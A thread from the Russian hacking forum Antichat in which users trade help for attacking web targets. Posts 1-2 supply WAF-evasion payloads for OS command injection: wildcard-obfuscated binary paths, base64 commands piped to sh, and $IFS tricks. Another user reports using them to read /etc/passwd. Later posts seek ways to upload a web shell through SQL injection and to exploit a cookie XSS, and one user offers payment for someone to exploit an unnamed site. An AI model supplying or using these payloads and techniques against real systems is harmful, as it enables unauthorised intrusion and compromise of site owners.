HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.04.2019, 19:16
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами: 5344886

Репутация: 441


По умолчанию

Цитата:
Сообщение от man474019  

hi all
os command injection in post data, mod_sec waf..when try echo test, it works
but when try uname, ls, pwd, dir waf deletes command, what real advice ?
Hi, try this:

Код:
/b?n/?s /
/b?n/un?m?
/?in/e??o "bHMgLWxh" | /?sr/b?n/b??e64 -d | /b?n/?h
 
Ответить с цитированием

  #2  
Старый 16.04.2019, 17:08
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами: 5344886

Репутация: 441


По умолчанию

Цитата:
Сообщение от man474019  

response
It seems that there are some unknown logic on backend, not traditional WAF. Try to fuzz and detect the white/black sequences and conduct the attack vector in accordance with the circumstances. For example:

Код:
;id;
`id`
;sleep 100;
`sleep 100`
uname${IFS}-a
echo$IFS"bHMgLWxh"|base64$IFS-d|sh
`echo$IFS"bHMgLWxh"|base64$IFS-d|sh>log.txt`

and so on...
Also check this.
 
Ответить с цитированием

  #3  
Старый 16.04.2019, 19:19
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от man474019  

@crlf
thank you for reply, I tried these variant for reading /etc/passwd, and now also tried your variants, but also WAF cuts functions (((
request
response
А ты чего ожидал от твоей команды ?
 
Ответить с цитированием

  #4  
Старый 23.04.2019, 12:34
xmp
Новичок
Регистрация: 14.12.2018
Сообщений: 12
С нами: 3903446

Репутация: 4
По умолчанию

Подскажите как загрузить шелл через SQLi

union based иньекция

FILE_PRIV = Y (5.5.60-log)

Включен --secure-file-priv соответственно into outfile не рабоатет.
 
Ответить с цитированием

  #5  
Старый 23.04.2019, 16:04
xmp
Новичок
Регистрация: 14.12.2018
Сообщений: 12
С нами: 3903446

Репутация: 4
По умолчанию

Цитата:
Сообщение от man474019  

hi
see if magic_quotes_gpc ON or OFF
you must find writable path/folder to upload your shell
and also you can try LOAD DATA INFILE
Yes i can upload file data to table, but im looking for way write data to file.

magic_quotes_gpc = off
 
Ответить с цитированием

  #6  
Старый 23.04.2019, 17:35
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от xmp  

Подскажите как загрузить шелл через SQLi
union based иньекция
FILE_PRIV = Y (5.5.60-log)
Включен --secure-file-priv соответственно into outfile не рабоатет.
попробуй переопределить, но скорее всего никак
 
Ответить с цитированием

  #7  
Старый 23.04.2019, 17:57
xmp
Новичок
Регистрация: 14.12.2018
Сообщений: 12
С нами: 3903446

Репутация: 4
По умолчанию

Цитата:
Сообщение от BabaDook  

попробуй переопределить, но скорее всего никак
Запись на включение находится в /etc/my.cnf

Верно понимаю что ты имеешь в виду?

Цитата:
Сообщение от None  
mysql>
SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-----------------------+
| Variable_name | Value |
+------------------+-----------------------+
| secure_file_priv |
/var/lib/mysql-files/
|
 
Ответить с цитированием

  #8  
Старый 23.04.2019, 18:05
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от xmp  

Запись на включение находится в /etc/my.cnf
Верно понимаю что ты имеешь в виду?
https://bugs.mysql.com/bug.php?id=50373
 
Ответить с цитированием

  #9  
Старый 30.04.2019, 20:14
WallHack
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами: 6747446

Репутация: 32
По умолчанию

Есть уязвимость, Cross site scripting в куках

GET site/eta.php HTTP/1.1

Referer: https://www.google.com/

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/45.0.2228.0 Safari/537.21

Cookie: cache=Cross site scripting


Есть пример эксплуатации такой уязвимости ?
 
Ответить с цитированием

  #10  
Старый 30.04.2019, 22:50
vladF
Новичок
Регистрация: 05.12.2018
Сообщений: 16
С нами: 3916406

Репутация: 0
По умолчанию

Может ли кто попробовать раскрутить уязвимость руками, в sqlmap никак не идет, но думаю надо руками. Сайт скину в личку. На пиво скину)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.